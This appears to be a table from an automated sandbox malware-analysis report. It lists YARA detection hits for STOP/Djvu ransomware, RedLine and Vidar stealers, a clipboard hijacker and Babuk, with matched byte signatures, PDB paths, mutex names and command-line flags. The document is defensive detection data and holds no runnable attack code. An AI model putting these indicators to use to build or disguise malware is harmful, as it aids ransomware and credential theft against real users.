00000010.00000002.2309561006.0000000000960000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001D.00000002.3965896478.0000000000960000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001D.00000002.3965896478.0000000000960000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001D.00000002.3965896478.0000000000960000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000000.00000002.2029947152.0000000004449000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2111904920.0000000001AFE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1190:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x3000b:$x5: vchost.exe 0x3100b:$x5: vchost.exe
0000000B.00000002.2229691147.00000000009AD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x79bc:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000018.00000002.2700850875.0000000004474000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001D.00000002.3966079968.0000000000AB0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x70cc:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000D.00000002.2231956376.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000000D.00000002.2231956376.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000000D.00000002.2231956376.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001E.00000002.3965041691.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001E.00000002.3965041691.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001E.00000002.3965041691.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000000B.00000002.2229449247.0000000000980000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000000B.00000002.2229449247.0000000000980000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000000B.00000002.2229449247.0000000000980000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000004.00000002.2052258442.0000000004449000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Process Memory Space: sIQywRNC5M.exe PID: 5896	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 5896	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4feb9:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: sIQywRNC5M.exe PID: 3624	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 3624	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x6054c:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: sIQywRNC5M.exe PID: 4712	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 4712	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3325b:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: sIQywRNC5M.exe PID: 4220	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 4220	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 4220	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x808f42:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: sIQywRNC5M.exe PID: 4160	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 4160	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4e5e7:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: sIQywRNC5M.exe PID: 1476	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 1476	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 1476	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3a849:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: build2.exe PID: 4292	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 5748	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 5748	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build2.exe PID: 5748	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 2928	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 2928	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x47221:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: sIQywRNC5M.exe PID: 3580	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 3580	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3ef4e:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: sIQywRNC5M.exe PID: 2624	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 2624	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x36c01:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: sIQywRNC5M.exe PID: 3808	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: sIQywRNC5M.exe PID: 3808	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3ef07:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 90 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
26.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
26.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
26.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
23.2.mstsca.exe.8f15a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
23.2.mstsca.exe.8f15a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
27.2.mstsca.exe.9715a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
27.2.mstsca.exe.9715a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
28.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
30.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
28.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
28.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
30.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
30.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 